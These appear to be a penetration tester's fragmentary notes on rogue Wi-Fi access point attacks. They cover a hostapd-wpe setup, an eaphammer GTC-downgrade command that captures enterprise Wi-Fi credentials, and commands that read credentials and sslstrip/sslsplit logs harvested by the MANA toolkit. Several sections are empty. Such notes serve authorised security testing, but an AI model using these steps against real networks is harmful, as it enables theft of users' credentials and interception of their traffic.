Rogue AP and MANA

Rogue AP - EAP

hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
GTC downgrade

Efficient against Android phones.

Efficient against iOS but it prompt for certificate.

Only a challenge-response against Windows can be captured.

Does not work if:

  • the supplicant uses a certificate based authentication since there is no inner authentication
  • the supplicant validates the server certificate
Balanced Approach (default)

Phase 1 (outer authentication):


Phase 2 (inner authentication):


Explicite GTC downgrade

./eaphammer --interface <wlan0> --negotiate gtc-downgrade --auth wpa-eap --essid <ESSID> --creds [--hw-mode <g/a>] [-c <channel>] [-b <BSSID>]

Rogue AP - OPEN or PSK


Mana is deprecated
I use a custom dedicated kali VM

Start Mana - Custom script



cat /var/lib/mana-toolkit/net-creds*
cat /var/lib/mana-toolkit/sslsplit-connect*
cat /var/lib/mana-toolkit/sslstrip.log*
strings /var/lib/mana-toolkit/sslsplit/* | grep -i <keywork>